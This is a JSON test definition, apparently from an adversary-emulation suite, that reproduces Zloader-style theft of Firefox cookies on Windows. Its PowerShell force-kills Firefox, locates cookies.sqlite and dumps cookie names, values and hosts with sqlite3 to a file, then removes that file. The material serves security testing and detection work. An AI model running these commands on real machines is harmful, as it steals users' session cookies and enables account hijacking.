{
  "id": "4b437357-f4e9-4c84-9fa6-9bcee6f826aa",
  "name": "Steal Firefox Cookies (Windows)",
  "description": "This test queries Firefox's cookies.sqlite database to steal the cookie data contained within it, similar to Zloader/Zbot's cookie theft function. \nNote: If Firefox is running, the process will be killed to ensure that the DB file isn't locked. \nSee https://www.malwarebytes.com/resources/files/2020/05/the-silent-night-zloader-zbot_final.pdf. \n",
  "platforms": [
    "windows"
  ],
  "steps": [
    {
      "id": "c1ef94d2-2751-4e32-b351-59960cbd4139",
      "type": "execute-command",
      "data": {
        "command": "stop-process -name \"firefox\" -force -erroraction silentlycontinue\n$CookieDBLocation = get-childitem -path \"$env:appdata\\Mozilla\\Firefox\\Profiles\\*\\cookies.sqlite\"\n\"select host, name, value, path, expiry, isSecure, isHttpOnly, sameSite from [moz_cookies];\" | cmd /c #{sqlite3_path} \"$CookieDBLocation\" | out-file -filepath \"#{output_file}\"\n",
        "command_type": "powershell"
      },
      "elevation_required": false
    },
    {
      "id": "64a6cc03-c542-4755-b42e-8937ecff1001",
      "type": "execute-command",
      "data": {
        "command": "remove-item #{output_file} -erroraction silentlycontinue\n",
        "command_type": "powershell"
      },
      "elevation_required": false
    },
    {
      "id": "23ec480b-1f6e-45e1-8c85-319a003879b2",
      "name": "Check dependency 1/1",
      "description": "Sqlite3 must exist at (#{sqlite3_path})\n",
      "type": "execute-command",
      "data": {
        "command": "if (Test-Path \"#{sqlite3_path}\") {exit 0} else {exit 1}\n",
        "command_type": ""
      },
      "elevation_required": false
    },
    {
      "id": "1880dfa6-3018-49e2-9095-e102c8c81376",
      "name": "Resolve dependency 1/1",
      "description": "Sqlite3 must exist at (#{sqlite3_path})\n",
      "type": "execute-command",
      "data": {
        "command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://www.sqlite.org/2022/sqlite-tools-win32-x86-3380200.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\sqlite.zip\"\nExpand-Archive -path \"PathToAtomicsFolder\\..\\ExternalPayloads\\sqlite.zip\" -destinationpath \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -force\n",
        "command_type": ""
      },
      "elevation_required": false
    },
    {
      "id": "fb28c003-e163-494b-b269-3c7c33460d11",
      "name": "Re-check dependency 1/1",
      "description": "Sqlite3 must exist at (#{sqlite3_path})\n",
      "type": "execute-command",
      "data": {
        "command": "if (Test-Path \"#{sqlite3_path}\") {exit 0} else {exit 1}\n",
        "command_type": ""
      },
      "elevation_required": false
    }
  ],
  "flows": [
    {
      "s": "c1ef94d2-2751-4e32-b351-59960cbd4139",
      "p": "on-success",
      "o": "64a6cc03-c542-4755-b42e-8937ecff1001"
    },
    {
      "s": "c1ef94d2-2751-4e32-b351-59960cbd4139",
      "p": "on-failure",
      "o": "64a6cc03-c542-4755-b42e-8937ecff1001"
    },
    {
      "s": "23ec480b-1f6e-45e1-8c85-319a003879b2",
      "p": "on-success",
      "o": "c1ef94d2-2751-4e32-b351-59960cbd4139"
    },
    {
      "s": "23ec480b-1f6e-45e1-8c85-319a003879b2",
      "p": "on-failure",
      "o": "1880dfa6-3018-49e2-9095-e102c8c81376"
    },
    {
      "s": "1880dfa6-3018-49e2-9095-e102c8c81376",
      "p": "on-success",
      "o": "fb28c003-e163-494b-b269-3c7c33460d11"
    },
    {
      "s": "fb28c003-e163-494b-b269-3c7c33460d11",
      "p": "on-failure",
      "o": "c1ef94d2-2751-4e32-b351-59960cbd4139"
    }
  ],
  "tags": [
    "T1539",
    "atomic-red-team"
  ],
  "input_arguments": [
    {
      "name": "sqlite3_path",
      "type": "path",
      "description": "Path to sqlite3",
      "value": "PathToAtomicsFolder\\..\\ExternalPayloads\\sqlite-tools-win32-x86-3380200\\sqlite3.exe"
    },
    {
      "name": "output_file",
      "type": "path",
      "description": "Filepath to output cookies",
      "value": "PathToAtomicsFolder\\..\\ExternalPayloads\\T1539FirefoxCookies.txt"
    }
  ]
}